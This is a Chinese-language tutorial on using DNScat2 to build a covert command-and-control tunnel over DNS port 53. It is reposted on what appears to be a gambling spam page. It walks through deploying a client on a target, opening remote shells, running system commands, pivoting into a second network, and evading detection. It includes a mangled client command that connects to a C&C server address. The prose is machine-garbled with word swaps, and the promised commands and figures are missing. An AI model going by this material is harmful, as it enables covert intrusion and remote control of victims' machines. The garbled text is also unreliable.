南宫28


 

南宫28DNScat2 东西 : 经过 DNS 进行 CC 通讯

日期:2021-07-30 06:09:56 浏览次数:56 分类:下一代DNS 来源:南宫28登录入口 作者:ng28南宫娱乐官网

  域名体系将 URL 和 IP 地址相关起来。有了 DNS,咱们就可以直接在浏览器中输入比较简单记的单词,而不是一连串的数字,这样人们就可以查找站点并且发送音讯了。

  当你在浏览器中输入域名拜访网站时,它首先会向 DNS 服务器发送恳求来查找域名对应的 IP 地址。找到 IP 地址之后,就会经过 IP 定位到对应的服务器然后获取网站的内容。令人惊奇的是,这整个进程只是只需求几毫秒。DNS 默许是运转在 53 端口上。

  DNScat 可谓神器,因为它可以经过 DNS 协议创立 C&C 地道,让进犯者愈加荫蔽。你可以拜访任何数据以及上传和下载文件,并且取得一个 shell。这个东西也是根据 53 端口的,所以你不需求对 DNS 服务器进行威望拜访,只需经过 53 端口就能树立衔接,速度会快许多,并且发送的流量都是正常流量。可是这些通讯流量在数据包日志里就十分显着了,简单被发现。

  DNScat 有服务端和客户端两个组件。要了解 DNScat 的作业原理,需求先了解这两个组件。

  客户端是要装置在方针机器中并且保持着运转状况。它是用 C 言语编写的,满意最少的基本条件就可以运转。当你运转客户端时,你需求指定一个域名。因为一切数据包都会发送到本地 DNS 服务器上,然后会发送到合法的 DNS 服务器来查询域名 ( 明显,这个域名是你可以操控的 ) 。

  服务端要在一个通用的 DNS 服务器上运转。它是根据 ruby 开发的,并且依靠于一些共同的 gems。当你运转这个服务端时,跟客户端相似,你需求指定它经过 53 端口监听哪些域名。当它接收到其间一个域名的流量时,它就会尝试着去树立一个合法的衔接。假如接收到其他流量,它也会主动疏忽不论,当然,你也可以在上游进行转发。

  接下来装置 bundler,因为它是 DNScat2 的一个首要依靠环境。要装置这个依靠,先进入到 DNScat2 的服务端目录,然后履行下面两条指令:

  一旦衔接树立起来之后,你可以在服务端看到存在一个会话,如下图。你可以用 sessions 指令来检查现已创立的会话。

  现在你现已进入该 session 了,你可以运用 ping 指令来 ping 方针,假如收到回复 pong,那么你的 ping 指令就履行成功了。

  此外,可以输入 help 指令来检查咱们可以履行的一切指令和选项。假如你想进入 shell,只需输入 shell 指令即可,它就会敞开一个新的窗口,进入到方针体系的 shell 中。

  当你进入 session 之后,你可以履行恣意的 shell 指令,比方 uname -a,如上图所示。

  DNScat2 最好的一种进犯方式便是 DNS 地道技能。假如在你的方针体系中履行 ifconfig 指令,有两个网络的话,如下图所示,那么履行 DNS 地道技能就十分简单了。

  衔接成功之后,你就可以运用’ ifconfig ’指令来检查你方才进行地道转发的网络,如下图所示:

  因为你现已 SSH 衔接到了第二个网络中,你也可以在这个网络中下载 DNScat2,以便进行进犯。当你在这个网络中下载好了 DNScat2,输入下面这条指令来履行,然后在你的 DNScat2 服务端去检查会线.exe --dns+server+192.168.174.131,port+53

  履行成功之后,你会取得一个新的会话,你可以经过 sessions 来检查会话,并且输入会话 id 来进入某个会话:

  并且你还可以履行 systeminfo 指令,这会显现第二个体系的详细信息,也便是你经过地道技能拿到权限的体系。

  即便是在约束十分严厉的情况下,DNS 流量也应该是答应放行的。咱们就可以使用 DNS 地道技能在方针主机和咱们的 C&C 服务器之间树立衔接。指令和信息都包含在 DNS 查询和辨认中,这也是很难检测的原因,即便恣意指令就隐藏在十分显眼的当地,可是它们被认为是合法的流量,也检测不出来。DNScat 也正是使用了这一点才成为了一个十分不错的进犯东西。


南宫28